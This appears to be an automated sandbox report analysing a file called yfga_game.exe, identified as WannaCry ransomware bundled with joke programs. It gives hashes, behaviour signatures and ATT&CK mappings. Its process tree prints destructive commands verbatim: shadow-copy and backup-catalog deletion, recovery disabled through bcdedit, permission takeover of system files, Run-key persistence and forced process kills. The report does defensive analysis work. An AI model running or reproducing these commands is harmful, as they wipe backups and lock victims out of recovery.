Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
117s -
max time network
107s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
-
submitted
15/07/2024, 08:36
General
-
Target
yfga_game.exe
-
Size
10.7MB
-
MD5
1864d9c2373236602ff186c28889d8f5
-
SHA1
28d619fb21f1ed64cc054ba81793aba9e3743487
-
SHA256
144c2e379f3876600e29384f71cbf9edb53ac3e45dee369b1f99e78476986254
-
SHA512
fdca345551700fbe893df0f6451995d70ce105ca2659a3da6ce355fb5c1b1c65cbbb1a0b04424d677444e6db8d58e3fa2d8d5db39ac64a1d4e308e49510865f8
-
SSDEEP
196608:ZO81jWusNrPGC0ePjqHbUjHicQskqPe1Cxcxk3ZAEUadzR8yc4ghrk:88tWhTr0eqgDiDjqG1Fxk3mEUadzRURi
Malware Config
Extracted
C:\Users\Admin\Desktop\yfga_game_61122aff-4bca-4cf6-9e67-75dff366e467\@[email protected]
wannacry
12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw
Signatures
-
Wannacry
WannaCry is a ransomware cryptoworm.
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
-
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 5 IoCs
-
ASPack v2.12-2.42 1 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Drops startup file 2 IoCs
-
Executes dropped EXE 16 IoCs
-
Loads dropped DLL 46 IoCs
-
Modifies file permissions 1 TTPs 5 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
UPX packed file 1 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Sets desktop wallpaper using registry 2 TTPs 3 IoCs
-
Drops file in Windows directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 7 IoCs
-
Enumerates system info in registry 2 TTPs 1 IoCs
-
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Kills process with taskkill 8 IoCs
-
Modifies Internet Explorer settings 1 TTPs 6 IoCs
-
Modifies registry class 64 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Modifies system certificate store 2 TTPs 14 IoCs
-
Runs regedit.exe 1 IoCs
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 33 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 23 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 2 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\yfga_game.exe"C:\Users\Admin\AppData\Local\Temp\yfga_game.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\Desktop\yfga_game_61122aff-4bca-4cf6-9e67-75dff366e467\YFGA.bat" "2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Desktop\yfga_game_61122aff-4bca-4cf6-9e67-75dff366e467\screenscrew.exescreenscrew.exe3⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\takeown.exetakeown C:\Windows\System32\logonui.exe Admin3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32\logonui.exe Grant:\Admin3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K hydra.cmd3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Desktop\yfga_game_61122aff-4bca-4cf6-9e67-75dff366e467\jokewarehydra.exejokewarehydra.exe4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_61122aff-4bca-4cf6-9e67-75dff366e467\annoy3.vbs"4⤵
-
-
-
C:\Windows\SysWOW64\takeown.exetakeown C:\Windows\Boot\Fonts\* Admin3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Users\Admin\Desktop\yfga_game_61122aff-4bca-4cf6-9e67-75dff366e467\walliant.exewalliant.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-PD6HO.tmp\walliant.tmp"C:\Users\Admin\AppData\Local\Temp\is-PD6HO.tmp\walliant.tmp" /SL5="$3020E,4511977,830464,C:\Users\Admin\Desktop\yfga_game_61122aff-4bca-4cf6-9e67-75dff366e467\walliant.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Programs\Walliant\walliant.exe"C:\Users\Admin\AppData\Local\Programs\Walliant\walliant.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\Boot\Fonts\* Grant:\Admin3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\xcopy.exexcopy C:\Windows\Fonts\seguisym.ttf C:\Windows\Boot\Fonts\segoe_slboot.ttf /y3⤵
- Drops file in Windows directory
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\reg.exereg import reg.reg3⤵
- Sets desktop wallpaper using registry
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im fontdrvhost.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im TextInputhost.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im explorer.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 53⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\shutdown.exeshutdown /r /t 30000 /c "HAHA I HACKED YOU AYFGA ROCKS YOU"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K spam.bat "forkbomb" /min3⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_61122aff-4bca-4cf6-9e67-75dff366e467\annoy.vbs"4⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgr.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 53⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\shutdown.exeshutdown /a3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 23⤵
- Delays execution with timeout.exe
-
-
C:\Users\Admin\Desktop\yfga_game_61122aff-4bca-4cf6-9e67-75dff366e467\win7recovery.exewin7recovery.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- System policy modification
-
C:\ProgramData\WbVhxCIDDK.exe"C:\ProgramData\WbVhxCIDDK.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WScript.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 123⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exetimeout 13⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im explorer.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WScript.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\shutdown.exeshutdown /a3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Desktop\yfga_game_61122aff-4bca-4cf6-9e67-75dff366e467\useroverflow.exeuseroverflow.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Desktop\yfga_game_61122aff-4bca-4cf6-9e67-75dff366e467\programoverflow.exeprogramoverflow.exe3⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\notepad.exenotepad.exe3⤵
-
-
C:\Windows\SysWOW64\regedit.exeregedit.exe3⤵
- Runs regedit.exe
-
-
C:\Windows\SysWOW64\mspaint.exemspaint.exe3⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\SysWOW64\charmap.execharmap.exe3⤵
-
-
C:\Windows\SysWOW64\timeout.exetimeout 213⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe3⤵
-
-
C:\Users\Admin\Desktop\yfga_game_61122aff-4bca-4cf6-9e67-75dff366e467\wannacryptor.exewannacryptor.exe3⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Sets desktop wallpaper using registry
-
C:\Windows\SysWOW64\attrib.exeattrib +h .4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Users\Admin\Desktop\yfga_game_61122aff-4bca-4cf6-9e67-75dff366e467\taskdl.exetaskdl.exe4⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\cmd.execmd /c 88591721032684.bat4⤵
-
C:\Windows\SysWOW64\cscript.execscript.exe //nologo m.vbs5⤵
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s F:\$RECYCLE4⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\Desktop\yfga_game_61122aff-4bca-4cf6-9e67-75dff366e467\@[email protected]
-
C:\Users\Admin\Desktop\yfga_game_61122aff-4bca-4cf6-9e67-75dff366e467\TaskData\Tor\taskhsvc.exeTaskData\Tor\taskhsvc.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\cmd.exe
-
C:\Users\Admin\Desktop\yfga_game_61122aff-4bca-4cf6-9e67-75dff366e467\@[email protected]
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet6⤵
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet7⤵
- Interacts with shadow copies
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete7⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Users\Admin\Desktop\yfga_game_61122aff-4bca-4cf6-9e67-75dff366e467\@[email protected]4⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "loxtqdbrvjwnha527" /t REG_SZ /d "\"C:\Users\Admin\Desktop\yfga_game_61122aff-4bca-4cf6-9e67-75dff366e467\tasksche.exe\"" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "loxtqdbrvjwnha527" /t REG_SZ /d "\"C:\Users\Admin\Desktop\yfga_game_61122aff-4bca-4cf6-9e67-75dff366e467\tasksche.exe\"" /f5⤵
- Adds Run key to start application
- Modifies registry key
-
-
-
C:\Users\Admin\Desktop\yfga_game_61122aff-4bca-4cf6-9e67-75dff366e467\@[email protected]
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 723⤵
- Delays execution with timeout.exe
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{682159d9-c321-47ca-b3f1-30e36b2ec8b9} -Embedding1⤵
- Drops file in Windows directory
- Checks processor information in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵
- Boot or Logon Autostart Execution: Active Setup
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Active Setup
1Registry Run Keys / Startup Folder
1Privilege Escalation
Boot or Logon Autostart Execution
2Active Setup
1Registry Run Keys / Startup Folder
1Defense Evasion
Direct Volume Access
1File and Directory Permissions Modification
2Windows File and Directory Permissions Modification
1Hide Artifacts
1Hidden Files and Directories
1Indicator Removal
2File Deletion
2Modify Registry
7Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
240KB
MD57bf2b57f2a205768755c07f238fb32cc
SHA145356a9dd616ed7161a3b9192e2f318d0ab5ad10
SHA256b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25
SHA51291a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9
-
Filesize
681B
MD5d3195201cf95a81365fee344b145a753
SHA1c90ac45af41cb163d3d256a2ff90428c308a0311
SHA25635d2625dc46f7546314c8db095685d2a4cf53794378fc789c11f06e0c898b6bc
SHA5125fea23a4f909b43025914b9e785bf546dcb65812b25367e29ff3f1ff74d868a4295481764c61a99247d512346fad7ab2126a13c813e5a902794e6fe0683a1986
-
Filesize
342B
MD5d05486accf7dc2e1594a8ae6b0a8f46e
SHA1816d599e9d4953007a700e012159c2f23341fa15
SHA25682d4a319f4a2089cbba74e8aa8fa3bf06ac0e39347b44cd4f25cdf1adaec66a9
SHA5120735cb57cb00ebda2687810b4785335ee8d2a7b94d28718d631e2ccc178d22473e8e39d5f0b9650ac8006f195971a6dedcca4b4175021aaf221d07347badc5dc
-
Filesize
11.3MB
MD5fddc7534f3281feb4419da7404d89b4c
SHA119bdefc2c9e0abd03fe5ee4fad9c813a837f844f
SHA256f13da9813fa11b81ee4180794cbad2b280422716a080bf4c0791996be7f7908e
SHA512c5428179dc222366234125bd78f63a9350c9329e4d46646bb3361de143974d261bd7a8df6155bc7ef46ad3725302837f4769a26459b8b4b5b5304a810303b1ea
-
Filesize
1KB
MD5b492287271363085810ef581a1be0fa3
SHA14b27b7d87e2fdbdda530afcda73784877cc1a691
SHA256a5fcca5b80f200e9a3ff358d9cac56a0ffabb6f26d97da7f850de14f0fb2709e
SHA512859fa454d8a72771038dc2ff9e7ec3905f83a6a828cc4fc78107b309bdcd45724c749357011af978163f93e7096eb9e9419e3258ea9bd6b652154fe6dd01d036
-
Filesize
114B
MD5d725d85cc5f30c0f695b03a9e7d0c4c0
SHA1131b68adcddb7ff3b3ce9c34c5277eb5d673f610
SHA2564d4588c42fa8df0ea45ad48aca4511bb4286f0deaa41fdf188c3b7ab9e1b698a
SHA51201f270a15aa10e60e14ac140ccb54e38cf8e57833ef1c0db7d36688a93ecdc0a59ecf9ead9366a5920faac7e28a2e0ee03759eb0fa92d455abc72f406fe8775b
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
412B
MD51408557031e348d2c9ee3697baa11aea
SHA16d13f3850f063182d21b8615771ae7d65fc5d36c
SHA256e5fcc094696cd1ca12c8ee858a48206c6ff56451e7aff21aea47da29e7af47d7
SHA51293fb80231aece547e7b69d6eda063a3d7cc49ed91082dec941c59990d47e1c85b68159c887a99eb369c3774db088dc0a10cacfd322b821acb7f0511a76678ba4
-
Filesize
933B
MD57a2726bb6e6a79fb1d092b7f2b688af0
SHA1b3effadce8b76aee8cd6ce2eccbb8701797468a2
SHA256840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5
SHA5124e107f661e6be183659fdd265e131a64cce2112d842226305f6b111d00109a970fda0b5abfb1daa9f64428e445e3b472332392435707c9aebbfe94c480c72e54
-
Filesize
3.0MB
MD5fe7eb54691ad6e6af77f8a9a0b6de26d
SHA153912d33bec3375153b7e4e68b78d66dab62671a
SHA256e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb
SHA5128ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f
-
Filesize
1KB
MD5f873c699ec012043f77d010d1afdf4d3
SHA10bb939611a1f8ea947b36c3fd7fa24c28b945194
SHA2565a27f0b4f20f2f25b188bfdd5d12e92a72fa33235036d32b5b6097ac362d21b7
SHA5124029adcd513a20c106418c0a25277be965661c26839bc2b20d4c2274f0044b84dc40dea94f1a5a24cb1c416ff379e82223a767fbe163d304e4c8196b33d680e0
-
Filesize
50B
MD53167d161336cbd296dc579d2295b0f22
SHA153253e5841e6a7a7a1b8bd08378af0a96b2f9a98
SHA256307879bf0d9bec07bab240b5010434801fbee520c99c5a617e8ac630f42dde80
SHA51262af8fa0c9a30ec6aa9b552fcac1879af1f00f5ceb48a77718b2a8e042e3524e2cd299f26fcde31ad8abf2dcb94d15cf45ecbce0bd5f9f93f44aca6327aa53ea
-
Filesize
44B
MD59a2ccbd3e2f1a2382fed7674c28dd086
SHA1b466bdd2079575c938de65285f02739143ecb170
SHA2564519cd5997afce27129ef943f121972f7b0b34aa018e4dd408892fc5c39bb59e
SHA5128929493211c17a8e99b908a8305dbebe2d96e1b54426e89ddba84c2010a86d7f6d0983080f29fa1ab7a0687d536c0546278b9fffe4560d84e4012f243f344d78
-
Filesize
56B
MD519cf22e8d63e787913b6617542211e19
SHA18c3d2f43025e5c4ef70e0c4d1f36692361f51b1f
SHA256dbec312d736f8a56f94ace99986d95d4355ef644a2fd908da1ff4c8b0a003979
SHA5128b9d192dd7f175e63aebcdfc8426876fa8bf3ae00d3cf10bb8fcf0d0c262b906de28784f5b97141f656e87bb548d343b8d5a127c06ecb407289e91f3fc199608
-
Filesize
1.4MB
MD5c17170262312f3be7027bc2ca825bf0c
SHA1f19eceda82973239a1fdc5826bce7691e5dcb4fb
SHA256d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa
SHA512c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c
-
Filesize
47B
MD55e578014c7017a85ca32f0b7e5d7df7f
SHA1c88d8e7179fcc070d4419be9f4d8647354c2f6ed
SHA256a964a717e3c47cb7d274e98928ca1271377d0d76a8908448e1b70e63af4082ad
SHA5127eb206b0cbc2a9b744246d8a83b2fccc70204c6e777b0fcbb838e63d477fe047d8827f3c0de823d55b9ab5cba2ab572ff3f543f76a3451fa81b31584cc767106
-
Filesize
43KB
MD5b2eca909a91e1946457a0b36eaf90930
SHA13200c4e4d0d4ece2b2aadb6939be59b91954bcfa
SHA2560b6c0af51cde971b3e5f8aa204f8205418ab8c180b79a5ac1c11a6e0676f0f7c
SHA512607d20e4a46932c7f4d9609ef9451e2303cd79e7c4778fe03f444e7dc800d6de7537fd2648c7c476b9f098588dc447e8c39d8b21cd528d002dfa513a19c6ebbf
-
Filesize
37KB
MD535c2f97eea8819b1caebd23fee732d8f
SHA1e354d1cc43d6a39d9732adea5d3b0f57284255d2
SHA2561adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e
SHA512908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf
-
Filesize
566KB
MD5c4aab3b24b159148d6d47a9e5897e593
SHA17061c2e85de9f3fd51cccdecb8965f1e710d1fe5
SHA25603a4d3563a7519542c662b5fd5d61215f3d76a3902717efe11230292ea4bbafc
SHA5129bc522ff0d598a1f1425a09a2794584c4991a99bc382b0ee9135311950cdbf2f5331ae041a4b01052735b5fae3a2763ea1b5c01ce679b07fba73c6f75cb4c252
-
Filesize
25KB
MD5aebe09cd7095ec201dc8acc350443242
SHA1df7337e051bd02e1fdd4005b63ed45b8ca3d9726
SHA256405d47dca73a5d6180db42e90c35931047c666ed1f1d6fab5ead6110c2356cc7
SHA512ffc658faf04fee47c1284d439a4c5b3931d2f9bcac9b40e36f59ad0ed4917f0252e639284f817ca84a6da57552f8e0fdf96936987c3f5cf689a537e42b47288d
-
Filesize
111KB
MD5e87a04c270f98bb6b5677cc789d1ad1d
SHA18c14cb338e23d4a82f6310d13b36729e543ff0ca
SHA256e03520794f00fb39ef3cfff012f72a5d03c60f89de28dbe69016f6ed151b5338
SHA5128784f4d42908e54ecedfb06b254992c63920f43a27903ccedd336daaeed346db44e1f40e7db971735da707b5b32206be1b1571bc0d6a2d6eb90bbf9d1f69de13
-
Filesize
158B
MD54af4ab45205580fecf659dd857522f6b
SHA178ec5ff7647ca56d8c8d72b4da551efa86e53675
SHA256b997f3a0d79493418f3e9da03dd95aea6b45b8a8c454e8e7d1f06de3ad3e1111
SHA512f77c7b4d034def85c363805fe625aefb4e461770418f9015d4d5241fb8d09707b9918d54e9b2cc35d06008097174cdda0bee9702466fe7e097014794fe4d77cb
-
Filesize
5.0MB
MD5929335d847f8265c0a8648dd6d593605
SHA10ff9acf1293ed8b313628269791d09e6413fca56
SHA2566613acb18cb8bf501fba619f04f8298e5e633cb220c450212bbc9dd2bef9538d
SHA5127c9a4d1bec430503cc355dc76955d341e001b06196d4b508cc35d64feb2e8ba30e824e7c3a11c27135d7d99801f45f62a5b558563b4c78f89f5d156a929063fd
-
Filesize
3.4MB
MD584c82835a5d21bbcf75a61706d8ab549
SHA15ff465afaabcbf0150d1a3ab2c2e74f3a4426467
SHA256ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
SHA51290723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244
-
Filesize
23KB
MD535cbdbe6987b9951d3467dda2f318f3c
SHA1c0c7bc36c2fb710938f7666858324b141bc5ff22
SHA256e4915f18fd6713ee84f27a06ed1f6f555cdbebe1522792cf4b4961664550cf83
SHA512e1f456f0b4db885f8475d2837f32f31c09f4b303c118f59be4786cf4303a31a2d3004656a3fcfbbf354326ed404afcb4d60966bca04a5e5de8fb8feaf581bce7
-
Filesize
114KB
MD5bf6a0f5d2d5f54ceb5b899a2172a335b
SHA1e8992a9d4aeb39647b262d36c1e28ac14702c83e
SHA25632ef07a1a2954a40436d625814d0ce0e04f4a45e711beebc7e159d4c1b2556b6
SHA51249a093345160b645209f4fc806ae67a55ff35e50f54c9fa7ec49d153743e448db9c2fafae61659165d0082fabc473c3e7d47573a481161ddb4c9b5fdd079fc90
-
Filesize
495KB
MD5283544d7f0173e6b5bfbfbc23d1c2fb0
SHA13e33b2ef50dac60b7411a84779d61bdb0ed9d673
SHA2569165e595b3a0de91ac91a38e742597e12ebb2a5a8fa53058d964a06ceaef7735
SHA512150b45cd43dc5cf191c85524c15dea09fbb48766ad802851270eaacfd73f3d097fef8dcf0ea042184220e7bc71413677d88a206d8bbe60374986e4789054040b
-
Filesize
72KB
MD5c1a31ab7394444fd8aa2e8fe3c7c5094
SHA1649a0915f4e063314e3f04d284fea8656f6eb62b
SHA25664b7231eda298844697d38dd3539bd97fe995d88ae0c5e0c09d63a908f7336c4
SHA5123514a69552dd1e1b63a235d7e3a1e982a72a9741ade4a931fc8d8e61f402228ad3243be9321d87fdefdfe137fc357925a931966266ec58c19296adb210be9b0e
-
Filesize
378KB
MD5f5ee17938d7c545bf62ad955803661c7
SHA1dd0647d250539f1ec580737de102e2515558f422
SHA2568a791af9e3861e231662b657098a823b21a084cbb6a4901d6ccf363405849a78
SHA512669a89ad811cda4f3ff4aa318aa03e26e4cb41ea22bc321bad02a671273d867cbd223a64bb30da592a5484a9f1cec77c96f5bf63b1fe586b6d3688b8c9da530c
-
Filesize
257KB
MD560d3737a1f84758238483d865a3056dc
SHA117b13048c1db4e56120fed53abc4056ecb4c56ed
SHA2563436c29dec2c7f633f4766acaf334f6c395d70ea6180c0ea7c1610591d5d89b9
SHA512d34f42b59349f3be1ac39a57207f616a44f56a6c74157be8116fff5df75275928065065a89f10bd79849e58b14d1e5e0ea156be5996ff8ca4f5d854e107c96fe
-
Filesize
2.5MB
MD562e5dbc52010c304c82ada0ac564eff9
SHA1d911cb02fdaf79e7c35b863699d21ee7a0514116
SHA256bd54ad7a25594dc823572d9b23a3490ff6b8b1742a75e368d110421ab08909b2
SHA512b5d863ea38816c18f7778ef12ea4168ceb0dae67704c0d1d4a60b0237ca6e758c1dfc5c28d4fc9679b0159de25e56d5dfff8addacd7a9c52572674d90c424946
-
Filesize
578KB
MD5533d78fdd538bbeee31fb0b72a8cfb7c
SHA1cb0e46804e784525f5bece40d51772bbdd9a5dc4
SHA256b7a4fcc7f474c091edc09349af5e53915d23f14071d78a3026c92c49d2467989
SHA51285e393cbdd2b20da8892173c7951ddf8e75dbfa29cf81fa725a2da56e606b848ea8a6636528d4fe26eca5e6b251406ec870242fe0d44e7863bf22c739d7759d5
-
Filesize
467KB
MD5ab65e866abc51f841465d19aba35fb14
SHA1ec79f1f511a199291b0893bc866a788ceac19f6e
SHA2562ac0ca4ffda10b1861dd4ae0c2f0131a6400214cb4f5fa33951f3062b784a755
SHA5122474905f174635b236e5f6e8f8c497e44435c94edd02ec47d3440c9a216f6840d040e6acc5fe2ec301ada80467f6cf55225d6361c1e7c6c6c7edccb9e7b5a35e
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
480KB
-
Filesize
480KB
-
Filesize
2.6MB
-
Filesize
2.6MB
-
Filesize
2.6MB
-
Filesize
11.0MB
-
Filesize
864KB
-
Filesize
864KB
-
Filesize
864KB
-
Filesize
144KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
560KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
2.3MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
520KB
-
Filesize
136KB
-
Filesize
2.1MB
-
Filesize
3.0MB
-
Filesize
2.1MB
-
Filesize
520KB
-
Filesize
3.0MB
-
Filesize
112KB
-
Filesize
520KB
-
Filesize
476KB
-
Filesize
3.0MB
-
Filesize
520KB
-
Filesize
2.1MB
-
Filesize
2.1MB
-
Filesize
3.0MB
-
Filesize
136KB
-
Filesize
4KB
-
Filesize
296KB
-
Filesize
296KB
-
Filesize
296KB
-
Filesize
296KB
-
Filesize
296KB
-
Filesize
296KB
-
Filesize
296KB
-
Filesize
4KB
-
Filesize
296KB
-
Filesize
2.3MB
-
Filesize
2.3MB